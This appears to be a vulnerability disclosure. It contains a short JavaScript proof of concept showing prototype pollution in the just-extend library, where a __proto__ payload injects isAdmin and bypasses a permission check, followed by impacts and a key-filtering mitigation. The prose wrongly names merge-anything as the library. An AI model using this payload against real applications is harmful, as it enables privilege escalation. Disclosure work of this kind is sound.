POC:

import extend from 'just-extend';
const defaultPermissions = {
    read: true,
    write: false,
    delete: false,
};

const payload = JSON.parse('{"__proto__": { "isAdmin": true }}');

const userPermissions = extend({}, defaultPermissions, payload);

console.log('User Permissions:', userPermissions);
console.log(userPermissions['isAdmin'])

if (userPermissions.isAdmin) {
    console.log('User has admin access');
} else {
    console.log('User does not have admin access');
}

This code demonstrates how prototype poisoning can occur by merging an object containing a proto property with default permissions using the merge-anything library. The isAdmin property is injected into the object's prototype.

• Unauthorized Access: Users can gain elevated permissions without proper authorization.
• Security Breach: Compromised data integrity and potential for privilege escalation.
• Inconsistent Behavior: Application logic relying on permissions can be bypassed, leading to unpredictable behavior and security vulnerabilities.

Mitigation

• Specifically check for keys like "proto", "prototype", "constructor"

Since this library has a lot of weekly downloads so there might multiple use cases that might be effected by this bug